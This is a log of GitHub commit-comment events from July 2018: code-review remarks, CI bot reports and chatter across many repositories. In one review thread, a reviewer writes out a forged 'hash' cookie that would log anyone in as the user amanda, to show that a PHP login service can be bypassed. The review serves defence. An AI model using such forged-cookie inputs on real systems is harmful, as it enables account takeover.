{"id":"8025879749","type":"CommitCommentEvent","actor":{"login":"benz11260"},"repo":{"name":"benz11260/Seagate-iBenz"},"payload":{"comment":{"id":29852224,"position":null,"line":null,"path":null,"commit_id":"86c24b2446c330b429ce6364cfa9c73d6223dc60","created_at":"2018-07-27T00:19:43Z","updated_at":"2018-07-27T00:19:43Z","author_association":"OWNER","body":"[Open Source Code in Toolkit Project_0308.xlsx](https://github.com/benz11260/Seagate-iBenz/files/2233971/Open.Source.Code.in.Toolkit.Project_0308.xlsx)\r\n"}},"created_at":"2018-07-27T00:19:43Z"}
{"id":"8025881162","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29852230,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-27T00:20:13Z","updated_at":"2018-07-27T00:20:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T00:20:13Z"}
{"id":"8025882290","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29852235,"position":null,"line":null,"path":null,"commit_id":"de224a4a5fcebdd0a6a3cf50c23e0bce23e59afc","created_at":"2018-07-27T00:20:37Z","updated_at":"2018-07-27T00:20:37Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-984](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-984).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-984-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T00:20:37Z"}
{"id":"8025885266","type":"CommitCommentEvent","actor":{"login":"nafiesl"},"repo":{"name":"nafiesl/free-pmo"},"payload":{"comment":{"id":29852243,"position":18,"line":49,"path":"app/Http/Controllers/Invoices/ItemsController.php","commit_id":"8ba3e9f79327d88770dd1dffa9dd10a96c7277d8","created_at":"2018-07-27T00:21:50Z","updated_at":"2018-07-27T00:21:50Z","author_association":"OWNER","body":"Iya mas, karena kolom amount di table `invoices` nya juga pakai integer. Bisa kalau mau float, tapi semua kolom harga kita seragamkan decimal semua."}},"created_at":"2018-07-27T00:21:50Z"}
{"id":"8025885498","type":"CommitCommentEvent","actor":{"login":"Shana6"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29852244,"position":null,"line":null,"path":null,"commit_id":"30990b5b316ac4cb38fe8fdf61085ddaf1f59292","created_at":"2018-07-27T00:21:55Z","updated_at":"2018-07-27T00:21:55Z","author_association":"CONTRIBUTOR","body":"aw rip datadog\r\n"}},"created_at":"2018-07-27T00:21:55Z"}
{"id":"8025885997","type":"CommitCommentEvent","actor":{"login":"Shana6"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29852245,"position":null,"line":null,"path":null,"commit_id":"30990b5b316ac4cb38fe8fdf61085ddaf1f59292","created_at":"2018-07-27T00:22:06Z","updated_at":"2018-07-27T00:22:06Z","author_association":"CONTRIBUTOR","body":"faster startup tho"}},"created_at":"2018-07-27T00:22:06Z"}
{"id":"8025887487","type":"CommitCommentEvent","actor":{"login":"richard-willdooit"},"repo":{"name":"OCA/operating-unit"},"payload":{"comment":{"id":29852247,"position":null,"line":null,"path":null,"commit_id":"fd2fc49de45f64774bf14f7cb7df026d5006f24a","created_at":"2018-07-27T00:22:40Z","updated_at":"2018-07-27T00:22:40Z","author_association":"NONE","body":"@IsabelEsparza @aheficent @michael-villamar \r\n\r\nTo my understanding - this is just wrong and should not be here at all.  I understand the need to refactor to get operating unit in, but base Odoo does not have this code about currency.\r\n\r\nNow, this fail if the currency and the company currency do not match the journal / target currency.\r\n\r\nE.g. A company in Australian Currency transfers 100 Euro from a Euro account to a USD account.  When writing to the USD side, self.currency_id will be Euro and self.company_id.currency_id will be AUD, but the transaction will be expecting the USD equivalent.\r\n\r\nBase Odoo is currenly handling it all correctly in '_get_shared_move_line_vals', but this code breaks it.\r\n\r\n"}},"created_at":"2018-07-27T00:22:40Z"}
{"id":"8025888116","type":"CommitCommentEvent","actor":{"login":"benz11260"},"repo":{"name":"benz11260/Seagate-iBenz"},"payload":{"comment":{"id":29852251,"position":null,"line":null,"path":null,"commit_id":"86c24b2446c330b429ce6364cfa9c73d6223dc60","created_at":"2018-07-27T00:22:55Z","updated_at":"2018-07-27T00:22:55Z","author_association":"OWNER","body":"[Open.Source.Code.in.Toolkit.Project_0308.xlsx](https://github.com/benz11260/Seagate-iBenz/files/2233975/Open.Source.Code.in.Toolkit.Project_0308.xlsx)\r\n[LICENSE.txt](https://github.com/benz11260/Seagate-iBenz/files/2233977/LICENSE.txt)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-27T00:22:55Z"}
{"id":"8025890292","type":"CommitCommentEvent","actor":{"login":"runspired"},"repo":{"name":"emberjs/data"},"payload":{"comment":{"id":29852259,"position":25,"line":655,"path":"addon/-record-data-private/system/relationships/state/relationship.js","commit_id":"39c8238d2b123c0921d013fe0f5f8d3577bed0f2","created_at":"2018-07-27T00:23:48Z","updated_at":"2018-07-27T00:23:48Z","author_association":"CONTRIBUTOR","body":"confirm on what it means, and yes it is consistent. I'll be following up with a deprecation."}},"created_at":"2018-07-27T00:23:48Z"}
{"id":"8025906534","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29852296,"position":null,"line":null,"path":null,"commit_id":"3253c8de32db34c893248f57c448d749b42c62a5","created_at":"2018-07-27T00:30:21Z","updated_at":"2018-07-27T00:30:21Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3213 "}},"created_at":"2018-07-27T00:30:21Z"}
{"id":"8025909953","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29852303,"position":null,"line":null,"path":null,"commit_id":"1cabd84749a226a440e54e88d487f6529d477d7b","created_at":"2018-07-27T00:31:41Z","updated_at":"2018-07-27T00:31:41Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-426](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-426).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-426-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-27T00:31:41Z"}
{"id":"8025910015","type":"CommitCommentEvent","actor":{"login":"ChristoNik"},"repo":{"name":"ChristoNik/ra"},"payload":{"comment":{"id":29852304,"position":null,"line":null,"path":null,"commit_id":"d7c70fdf8b304fe3282aa19a0d602f6888b4ccf0","created_at":"2018-07-27T00:31:42Z","updated_at":"2018-07-27T00:31:42Z","author_association":"OWNER","body":"ha"}},"created_at":"2018-07-27T00:31:42Z"}
{"id":"8025912325","type":"CommitCommentEvent","actor":{"login":"runspired"},"repo":{"name":"emberjs/data"},"payload":{"comment":{"id":29852311,"position":25,"line":655,"path":"addon/-record-data-private/system/relationships/state/relationship.js","commit_id":"39c8238d2b123c0921d013fe0f5f8d3577bed0f2","created_at":"2018-07-27T00:32:30Z","updated_at":"2018-07-27T00:32:30Z","author_association":"CONTRIBUTOR","body":"(by consistent I mean it's what we *used* to do, we broke it around 3.0)"}},"created_at":"2018-07-27T00:32:30Z"}
{"id":"8025920391","type":"CommitCommentEvent","actor":{"login":"AyaMorisawa"},"repo":{"name":"syuilo/misskey"},"payload":{"comment":{"id":29852317,"position":null,"line":null,"path":null,"commit_id":"a4ee93a355df1450feb7596e011855addbebded9","created_at":"2018-07-27T00:35:51Z","updated_at":"2018-07-27T00:35:51Z","author_association":"COLLABORATOR","body":":+1: :+1: :+1: \r\n\r\n:pray: "}},"created_at":"2018-07-27T00:35:51Z"}
{"id":"8025921477","type":"CommitCommentEvent","actor":{"login":"JPh0enix"},"repo":{"name":"JPh0enix/FinalProjectGC"},"payload":{"comment":{"id":29852319,"position":null,"line":null,"path":null,"commit_id":"be389025962e43a7465ba2074e989412ea866fc6","created_at":"2018-07-27T00:36:17Z","updated_at":"2018-07-27T00:36:17Z","author_association":"OWNER","body":"Pagina final"}},"created_at":"2018-07-27T00:36:17Z"}
{"id":"8025922006","type":"CommitCommentEvent","actor":{"login":"BigBoyMcCoolGuy"},"repo":{"name":"lykelly19/chsrobotics"},"payload":{"comment":{"id":29852321,"position":null,"line":null,"path":null,"commit_id":"2c1132700885adea3bd17cc08b94a6cea8ab9e29","created_at":"2018-07-27T00:36:32Z","updated_at":"2018-07-27T00:36:32Z","author_association":"COLLABORATOR","body":"hey dudes\r\n\r\n![download](https://user-images.githubusercontent.com/41763371/43295535-938c1a28-9113-11e8-8899-ecf34652db43.jpg)\r\n"}},"created_at":"2018-07-27T00:36:32Z"}
{"id":"8025922814","type":"CommitCommentEvent","actor":{"login":"willgearty"},"repo":{"name":"learning-unlimited/ESP-Website"},"payload":{"comment":{"id":29852322,"position":null,"line":null,"path":null,"commit_id":"b03a9e023e31f26d2318b119364130a4deb8c574","created_at":"2018-07-27T00:36:52Z","updated_at":"2018-07-27T00:36:52Z","author_association":"CONTRIBUTOR","body":"Probably shouldn't be committing directly to the SR-10 branch. Please make a pull request for new features or bug fixes. If you need this on a site immediately, you can make a local template override."}},"created_at":"2018-07-27T00:36:52Z"}
{"id":"8025922971","type":"CommitCommentEvent","actor":{"login":"llighter"},"repo":{"name":"llighter/messaging"},"payload":{"comment":{"id":29852323,"position":9,"line":9,"path":"route.js","commit_id":"0538f028d68f269cd714568135951f8f9b2139d1","created_at":"2018-07-27T00:36:56Z","updated_at":"2018-07-27T00:36:56Z","author_association":"OWNER","body":"교제에 나와있는 계정과 비밀번호 작성할 것!"}},"created_at":"2018-07-27T00:36:56Z"}
{"id":"8025929663","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29852340,"position":null,"line":null,"path":null,"commit_id":"70b7d899f362d29d4337225596139b7aea03fdfe","created_at":"2018-07-27T00:39:46Z","updated_at":"2018-07-27T00:39:46Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - i386-Windows-7-VisualStudio-14: OK (2956 of 2956 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70b7d899f362d29d4337225596139b7aea03fdfe-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70b7d899f362d29d4337225596139b7aea03fdfe-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T00:39:46Z"}
{"id":"8025929735","type":"CommitCommentEvent","actor":{"login":"llighter"},"repo":{"name":"llighter/messaging"},"payload":{"comment":{"id":29852341,"position":53,"line":53,"path":"route.js","commit_id":"0538f028d68f269cd714568135951f8f9b2139d1","created_at":"2018-07-27T00:39:48Z","updated_at":"2018-07-27T00:39:48Z","author_association":"OWNER","body":"나중에 전송할 POST로 메시지 전송할 때 이부분을 JSON 형태로 전송하면 된다.\r\n```\r\n{\r\n  dest_phone: xxx,\r\n  msg_body: xxx\r\n}\r\n```"}},"created_at":"2018-07-27T00:39:48Z"}
{"id":"8025930294","type":"CommitCommentEvent","actor":{"login":"cjw94022"},"repo":{"name":"spacemonkeygo/openssl"},"payload":{"comment":{"id":29852342,"position":null,"line":null,"path":null,"commit_id":"6ac1e9e6b9c40f18293bcd27a180cea1bbb327c7","created_at":"2018-07-27T00:40:02Z","updated_at":"2018-07-27T00:40:02Z","author_association":"NONE","body":"There is syntax error in this commit. The line at 335 is missing a ;. This is causing go builds to fail."}},"created_at":"2018-07-27T00:40:02Z"}
{"id":"8025932529","type":"CommitCommentEvent","actor":{"login":"alexeagle"},"repo":{"name":"bazelbuild/rules_nodejs"},"payload":{"comment":{"id":29852344,"position":null,"line":null,"path":null,"commit_id":"6e53e6472a3c5fbaec317addb02a7711a4d2ee72","created_at":"2018-07-27T00:40:55Z","updated_at":"2018-07-27T00:40:55Z","author_association":"COLLABORATOR","body":"This caused a breakage downstream in rules_typescript.\r\nMaybe we can just `exec` to replace the bash process with node? Does that also solve your problem? We need a test so I can tell if your use case still works"}},"created_at":"2018-07-27T00:40:55Z"}
{"id":"8025934320","type":"CommitCommentEvent","actor":{"login":"AhmedAbdohOrtiga"},"repo":{"name":"AhmedAbdohOrtiga/TimeWastingTracker"},"payload":{"comment":{"id":29852349,"position":null,"line":null,"path":null,"commit_id":"0a129b26f2e64314c47807a6af5ba491aafae21e","created_at":"2018-07-27T00:41:40Z","updated_at":"2018-07-27T00:41:40Z","author_association":"OWNER","body":"![37812531_1869222926470599_1551915861801959424_n](https://user-images.githubusercontent.com/7956818/43295648-245a3d32-90fb-11e8-891c-f2e18cef88d2.png)\r\n"}},"created_at":"2018-07-27T00:41:40Z"}
{"id":"8025934411","type":"CommitCommentEvent","actor":{"login":"sangl003"},"repo":{"name":"sangl003/Recap_Bootstrap_JQ"},"payload":{"comment":{"id":29852350,"position":null,"line":null,"path":null,"commit_id":"91f10eae35cfee2fed991e223fb2ab4839d8757f","created_at":"2018-07-27T00:41:42Z","updated_at":"2018-07-27T00:41:42Z","author_association":"OWNER","body":"java script"}},"created_at":"2018-07-27T00:41:42Z"}
{"id":"8025935006","type":"CommitCommentEvent","actor":{"login":"richard-willdooit"},"repo":{"name":"OCA/operating-unit"},"payload":{"comment":{"id":29852352,"position":null,"line":null,"path":null,"commit_id":"fd2fc49de45f64774bf14f7cb7df026d5006f24a","created_at":"2018-07-27T00:41:57Z","updated_at":"2018-07-27T00:41:57Z","author_association":"NONE","body":"i.e. lines 47-51 should be removed:\r\n```\r\n        if self.currency_id != self.company_id.currency_id:\r\n            dst_liquidity_aml_dict.update({\r\n                'currency_id': self.currency_id.id,\r\n                'amount_currency': self.amount,\r\n            })\r\n```"}},"created_at":"2018-07-27T00:41:57Z"}
{"id":"8025935969","type":"CommitCommentEvent","actor":{"login":"rui314"},"repo":{"name":"ShinyaKato/seccamp2018"},"payload":{"comment":{"id":29852353,"position":9,"line":128,"path":"parse.c","commit_id":"fcbc60556fe7625f6ca182e51a2848f384f7c6f9","created_at":"2018-07-27T00:42:21Z","updated_at":"2018-07-27T00:42:21Z","author_association":"NONE","body":"このチェックは不要のはず。二項演算子の+をコンパイルしているコードとここのコードは共通しているはずなので、それを別の関数にくくりだして、ここではその関数を使うようにしてみてください。"}},"created_at":"2018-07-27T00:42:21Z"}
{"id":"8025937419","type":"CommitCommentEvent","actor":{"login":"nathansimpson95"},"repo":{"name":"keystonejs/keystone"},"payload":{"comment":{"id":29852355,"position":null,"line":null,"path":null,"commit_id":"1654e447ca77c7b75018447a96c583a1577fa669","created_at":"2018-07-27T00:43:00Z","updated_at":"2018-07-27T00:43:00Z","author_association":"CONTRIBUTOR","body":"Fixed #4735 "}},"created_at":"2018-07-27T00:43:00Z"}
{"id":"8025939776","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29852357,"position":null,"line":null,"path":null,"commit_id":"872ecf1520d6616358fd5664e59509f38560a0a4","created_at":"2018-07-27T00:43:56Z","updated_at":"2018-07-27T00:43:56Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3213 "}},"created_at":"2018-07-27T00:43:56Z"}
{"id":"8025943581","type":"CommitCommentEvent","actor":{"login":"isaactelea"},"repo":{"name":"TryGhost/Ghost"},"payload":{"comment":{"id":29852365,"position":2,"line":2,"path":".gitattributes","commit_id":"d5011eb91267ea4ab619ed910cafc4b70376b7b9","created_at":"2018-07-27T00:45:29Z","updated_at":"2018-07-27T00:45:29Z","author_association":"NONE","body":"Get"}},"created_at":"2018-07-27T00:45:29Z"}
{"id":"8025943721","type":"CommitCommentEvent","actor":{"login":"crosshj"},"repo":{"name":"crosshj/expo-sandbox"},"payload":{"comment":{"id":29852367,"position":null,"line":null,"path":null,"commit_id":"9d59e27094aeb12e87772fdb52558433a3d93882","created_at":"2018-07-27T00:45:32Z","updated_at":"2018-07-27T00:45:32Z","author_association":"OWNER","body":"Pretty cool!\r\n\r\nKeep up the great work!\r\n\r\n:+1: :banana: :japanese_ogre: "}},"created_at":"2018-07-27T00:45:32Z"}
{"id":"8025948991","type":"CommitCommentEvent","actor":{"login":"nathansimpson95"},"repo":{"name":"keystonejs/keystone"},"payload":{"comment":{"id":29852373,"position":null,"line":null,"path":null,"commit_id":"a6c0c28a89f1c3248b3dec55b7d29650933ea7bf","created_at":"2018-07-27T00:47:46Z","updated_at":"2018-07-27T00:47:46Z","author_association":"CONTRIBUTOR","body":"Fixed #4675 "}},"created_at":"2018-07-27T00:47:46Z"}
{"id":"8025955771","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29852385,"position":null,"line":null,"path":null,"commit_id":"db957a353f903259ec4444ef10c7d612805c7b26","created_at":"2018-07-27T00:50:41Z","updated_at":"2018-07-27T00:50:41Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3213 "}},"created_at":"2018-07-27T00:50:41Z"}
{"id":"8025962713","type":"CommitCommentEvent","actor":{"login":"TheFenderStory"},"repo":{"name":"DigimonShowdown/DS-Client"},"payload":{"comment":{"id":29852396,"position":null,"line":null,"path":null,"commit_id":"59182be152e86aa2707f4e63dfbe328c91983a94","created_at":"2018-07-27T00:53:38Z","updated_at":"2018-07-27T00:53:38Z","author_association":"COLLABORATOR","body":"Empty commit?"}},"created_at":"2018-07-27T00:53:38Z"}
{"id":"8025962858","type":"CommitCommentEvent","actor":{"login":"FndNur1Labs"},"repo":{"name":"cryptonotefoundation/cryptonote"},"payload":{"comment":{"id":29852398,"position":null,"line":null,"path":null,"commit_id":"080090db0d139e40bc776d3932afee65bb1f9f7e","created_at":"2018-07-27T00:53:42Z","updated_at":"2018-07-27T00:53:42Z","author_association":"NONE","body":"will fixed for daemon sync?"}},"created_at":"2018-07-27T00:53:42Z"}
{"id":"8025965609","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29852404,"position":null,"line":null,"path":null,"commit_id":"176882df85307ccfced64bd2048df8f71bdac432","created_at":"2018-07-27T00:54:56Z","updated_at":"2018-07-27T00:54:56Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3213 "}},"created_at":"2018-07-27T00:54:56Z"}
{"id":"8025966578","type":"CommitCommentEvent","actor":{"login":"Noibat"},"repo":{"name":"DigimonShowdown/DS-Client"},"payload":{"comment":{"id":29852406,"position":null,"line":null,"path":null,"commit_id":"59182be152e86aa2707f4e63dfbe328c91983a94","created_at":"2018-07-27T00:55:21Z","updated_at":"2018-07-27T00:55:21Z","author_association":"COLLABORATOR","body":"glitch i guess\r\n"}},"created_at":"2018-07-27T00:55:21Z"}
{"id":"8025967296","type":"CommitCommentEvent","actor":{"login":"hanswang"},"repo":{"name":"amanda-lan/UserLoginService"},"payload":{"comment":{"id":29852408,"position":12,"line":13,"path":"www/newindex.php","commit_id":"9c7e6ea64b428c1b8d6e2dda8c2143d1c73ca8b9","created_at":"2018-07-27T00:55:39Z","updated_at":"2018-07-27T00:55:39Z","author_association":"NONE","body":"你拿到username了，然后就直接登陆了？\r\n你这个基本上就是说，任何user 如果在cookie里面设置过rememberme，然后有一个hash，然后就直接explode就登陆了。"}},"created_at":"2018-07-27T00:55:39Z"}
{"id":"8025968969","type":"CommitCommentEvent","actor":{"login":"apropos"},"repo":{"name":"symfony/cache"},"payload":{"comment":{"id":29852411,"position":8,"line":43,"path":"Traits/MemcachedTrait.php","commit_id":"e4748c7aee5e7c41ae69d60f6d516772d45174cf","created_at":"2018-07-27T00:56:23Z","updated_at":"2018-07-27T00:56:23Z","author_association":"NONE","body":"the ? shouldn't be here. ?MarshallerInterface should just be MarshallerInterface"}},"created_at":"2018-07-27T00:56:23Z"}
{"id":"8025971003","type":"CommitCommentEvent","actor":{"login":"hanswang"},"repo":{"name":"amanda-lan/UserLoginService"},"payload":{"comment":{"id":29852416,"position":12,"line":13,"path":"www/newindex.php","commit_id":"9c7e6ea64b428c1b8d6e2dda8c2143d1c73ca8b9","created_at":"2018-07-27T00:57:12Z","updated_at":"2018-07-27T00:57:12Z","author_association":"NONE","body":"如果我把cookie设置成 $_COOKIE['hash'] = base64_encode('amanda,'.'fakepswd')\r\n我就直接可以登陆成为amanda了？"}},"created_at":"2018-07-27T00:57:12Z"}
{"id":"8025971853","type":"CommitCommentEvent","actor":{"login":"leantide"},"repo":{"name":"airbnb/lottie-web"},"payload":{"comment":{"id":29852418,"position":null,"line":null,"path":null,"commit_id":"416373f3aa3bd18e20e87b43c446f6455ddcbe18","created_at":"2018-07-27T00:57:35Z","updated_at":"2018-07-27T00:57:35Z","author_association":"NONE","body":"Just retried this in v5.2.0 and unfortunately the issue continues to exist: segments played in reverse erroneously play twice in reverse."}},"created_at":"2018-07-27T00:57:35Z"}
{"id":"8025972601","type":"CommitCommentEvent","actor":{"login":"RichardGarcia"},"repo":{"name":"root-systems/cobuy-atomic"},"payload":{"comment":{"id":29852419,"position":null,"line":null,"path":null,"commit_id":"353104a2708103fb37dcbc20fa5a8d63d243e50a","created_at":"2018-07-27T00:57:55Z","updated_at":"2018-07-27T00:57:55Z","author_association":"COLLABORATOR","body":"This is just an example of Material UI buttons. Default, Primary and Secondary - Contained variant"}},"created_at":"2018-07-27T00:57:55Z"}
{"id":"8025973341","type":"CommitCommentEvent","actor":{"login":"mdmosiurrahman"},"repo":{"name":"mdmosiurrahman/HYF_Home_Work"},"payload":{"comment":{"id":29852421,"position":null,"line":null,"path":null,"commit_id":"c16514d8cb9ed0311fb9509473cbc526bd8628ca","created_at":"2018-07-27T00:58:16Z","updated_at":"2018-07-27T00:58:16Z","author_association":"OWNER","body":"*{\r\n\tmargin: 0;\r\n\tpadding: 0;\r\n\tbox-sizing: border-box;\r\n}\r\n\r\n#mainWrapper{\r\n\tbackground: #36384E;\r\n\tcolor: #fff;\r\n\ttext-align: center;\r\n\tpadding: 20px;\r\n\tmargin-bottom: 30px;\r\n}\r\n\r\nheader{\r\n\ttext-align: center;\r\n\tpadding: 10px;\r\n}\r\n#step3{\r\n\tbackground: orange;\r\n\tcolor: #fff;\r\n\ttext-align: center;\r\n\tpadding: 20px;\r\n\tmargin-bottom: 30px;\r\n}\r\n\r\n#btn{\r\n\toutline: none;\r\n    border: 0;\r\n    cursor: pointer;\r\n    position: relative;\r\n    display: block;\r\n    margin: 0 auto 30px;\r\n    font-size: 14px;\r\n    font-weight: 300;\r\n    color: #fff;\r\n    text-transform: uppercase;\r\n    padding: 10px 30px;\r\n    border-radius: 10px;\r\n    transition: .05s;\r\n    min-width: 200px;\r\n    background:  orange;\r\n    box-shadow: 0 6px #181a2d;\r\n}\r\n"}},"created_at":"2018-07-27T00:58:16Z"}
{"id":"8025974421","type":"CommitCommentEvent","actor":{"login":"hanswang"},"repo":{"name":"amanda-lan/UserLoginService"},"payload":{"comment":{"id":29852425,"position":31,"line":35,"path":"www/signin.php","commit_id":"9c7e6ea64b428c1b8d6e2dda8c2143d1c73ca8b9","created_at":"2018-07-27T00:58:47Z","updated_at":"2018-07-27T00:58:47Z","author_association":"NONE","body":"encode的时候是一个string，将来输出用了explode，你输入的string里要有个“，”吧"}},"created_at":"2018-07-27T00:58:47Z"}
{"id":"8025975217","type":"CommitCommentEvent","actor":{"login":"GitHub-cordero"},"repo":{"name":"GitHub-cordero/entregable-001-GitHub-cordero"},"payload":{"comment":{"id":29852426,"position":5,"line":5,"path":"Base de datos/Dump20180707.sql","commit_id":"875bc7036e76d66700d151d0e424b879015de954","created_at":"2018-07-27T00:59:07Z","updated_at":"2018-07-27T00:59:07Z","author_association":"OWNER","body":"kj\r\n"}},"created_at":"2018-07-27T00:59:07Z"}
{"id":"8025993570","type":"CommitCommentEvent","actor":{"login":"mskQ9"},"repo":{"name":"mskQ9/visualstudio-docs.ja-jp"},"payload":{"comment":{"id":29852457,"position":null,"line":null,"path":null,"commit_id":"d2dd2628323cf33241b0e5ed69ef1bfe3f377e41","created_at":"2018-07-27T01:06:46Z","updated_at":"2018-07-27T01:06:46Z","author_association":"OWNER","body":"Merging changes synced"}},"created_at":"2018-07-27T01:06:46Z"}
{"id":"8025993678","type":"CommitCommentEvent","actor":{"login":"OhnoIvecreatedamess"},"repo":{"name":"xupefei/Locale-Emulator"},"payload":{"comment":{"id":29852458,"position":null,"line":null,"path":null,"commit_id":"b6eb3fe5de3885aa29763692d287e2e8e74f14ac","created_at":"2018-07-27T01:06:48Z","updated_at":"2018-07-27T01:06:48Z","author_association":"NONE","body":"Can I ask for a guide on how to install it after using it? "}},"created_at":"2018-07-27T01:06:48Z"}
{"id":"8025994813","type":"CommitCommentEvent","actor":{"login":"hanswang"},"repo":{"name":"amanda-lan/UserLoginService"},"payload":{"comment":{"id":29852461,"position":null,"line":null,"path":null,"commit_id":"b97a7e4050f5db772e6ad5cd0fbeb41f790994cf","created_at":"2018-07-27T01:07:18Z","updated_at":"2018-07-27T01:07:18Z","author_association":"NONE","body":"Looks OK."}},"created_at":"2018-07-27T01:07:18Z"}
{"id":"8025995733","type":"CommitCommentEvent","actor":{"login":"ikatyang"},"repo":{"name":"ikatyang/prettier"},"payload":{"comment":{"id":29852462,"position":null,"line":null,"path":null,"commit_id":"a3e93168014d48e32ad11434b6145d7822437ed3","created_at":"2018-07-27T01:07:41Z","updated_at":"2018-07-27T01:07:41Z","author_association":"OWNER","body":"@j-f1 thank you! ❤️"}},"created_at":"2018-07-27T01:07:41Z"}
{"id":"8025996786","type":"CommitCommentEvent","actor":{"login":"hanswang"},"repo":{"name":"amanda-lan/UserLoginService"},"payload":{"comment":{"id":29852463,"position":null,"line":null,"path":null,"commit_id":"b97a7e4050f5db772e6ad5cd0fbeb41f790994cf","created_at":"2018-07-27T01:08:09Z","updated_at":"2018-07-27T01:08:09Z","author_association":"NONE","body":"Could start to using some formatting tool or linting tool."}},"created_at":"2018-07-27T01:08:09Z"}
{"id":"8025997831","type":"CommitCommentEvent","actor":{"login":"Gangceen"},"repo":{"name":"nvcervantes/apc_softdev_mi151_04"},"payload":{"comment":{"id":29852465,"position":null,"line":null,"path":null,"commit_id":"0d0720cb62de8f3bd7e9db55c256d2185884d820","created_at":"2018-07-27T01:08:36Z","updated_at":"2018-07-27T01:08:36Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FEM - Obtain sakay.ph source code](https://trello.com/c/slvKjRpm/27-fem-obtain-sakayph-source-code)"}},"created_at":"2018-07-27T01:08:36Z"}
{"id":"8025998252","type":"CommitCommentEvent","actor":{"login":"jingxinfan"},"repo":{"name":"Leetsong/HackerNewsAndroid"},"payload":{"comment":{"id":29852466,"position":null,"line":null,"path":null,"commit_id":"670b5c5ed51c83380ac09b0cce2d4ec8d5b924a9","created_at":"2018-07-27T01:08:46Z","updated_at":"2018-07-27T01:08:46Z","author_association":"NONE","body":"o sorry  @Leetsong "}},"created_at":"2018-07-27T01:08:46Z"}
{"id":"8025998794","type":"CommitCommentEvent","actor":{"login":"Gangceen"},"repo":{"name":"nvcervantes/apc_softdev_mi151_04"},"payload":{"comment":{"id":29852468,"position":null,"line":null,"path":null,"commit_id":"efc31cfa69eda6c3ef6f1427c6ad18119cb78b59","created_at":"2018-07-27T01:08:58Z","updated_at":"2018-07-27T01:08:58Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FEM - Obtain sakay.ph source code](https://trello.com/c/slvKjRpm/27-fem-obtain-sakayph-source-code)"}},"created_at":"2018-07-27T01:08:58Z"}
{"id":"8026005265","type":"CommitCommentEvent","actor":{"login":"TheLordOfAllMuffins"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29852479,"position":null,"line":null,"path":null,"commit_id":"e0fe4f70d927e400d37600a12555ec89aae4a991","created_at":"2018-07-27T01:11:38Z","updated_at":"2018-07-27T01:11:38Z","author_association":"CONTRIBUTOR","body":"what about ground?"}},"created_at":"2018-07-27T01:11:38Z"}
{"id":"8026014289","type":"CommitCommentEvent","actor":{"login":"July31Junho"},"repo":{"name":"CodeChain-io/codechain"},"payload":{"comment":{"id":29852504,"position":null,"line":null,"path":null,"commit_id":"52689ec4997a8a50f76adea144e7c883ff1653a4","created_at":"2018-07-27T01:15:17Z","updated_at":"2018-07-27T01:15:17Z","author_association":"NONE","body":"Thanks you!"}},"created_at":"2018-07-27T01:15:17Z"}
